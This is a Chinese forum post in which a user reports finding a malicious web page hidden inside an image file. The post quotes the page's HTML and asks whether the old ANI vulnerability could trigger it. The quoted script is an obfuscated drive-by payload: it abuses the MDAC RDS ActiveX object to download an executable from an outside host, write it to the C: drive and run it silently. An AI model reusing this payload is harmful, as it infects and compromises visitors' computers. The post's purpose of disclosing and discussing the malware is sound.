这个图片用记事本打开就知道了.
里面夹带着病毒网页.
-
- <html>
- <head>
- <meta http-equiv="Content-Type" content="text/html; charset=US-ASCII" />
- <title>0.A5G'Q)</title>
- </head><body>
- <noscript>
- <iframe src=*></iframe>
- </noscript>
- <script language="JavaScript">
- <!--
- document.writeln("<script>var ailian,zhan;ailian="htp://w.dzy520.com/0.exe";zhan="c:\game.com";try{var ado=(document.createElement("object"));var d=1;ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");var chenzi=1;var fan=ado.CreateObject("Microsoft.XMLHTTP","");var f=1;var ln="Ado";var lzn="db.St";var an="ream";var g=1;var china=ado.createobject(ln+lzn+an,"");var h=1;fan.Open("GET",ailian,0);fan.Send();china.type=1;var n=1;china.open();china.write(fan.responseBody);china.savetofile(zhan,2);china.close();var chinahks=ado.createobject("ShelL.Application","");chinahks.ShelLexecute(zhan,"","","open",0);}catch(chenzi){};</script\>");
- //-->
- </script>
- <script type="text/jscript">function init() { document.write("");}window.onload = init;</script>
- <body oncontextmenu="return false" onselectstart="return false" ondragstart="return false">?
- </body></html>
复制代码
还有个ANI的地址也是htp://w.dzy520.com/0.exe
是个老病毒地址反正,有没有更新就不知道了.
地址插GIF最后也能被触发难道?ANI那个漏洞? |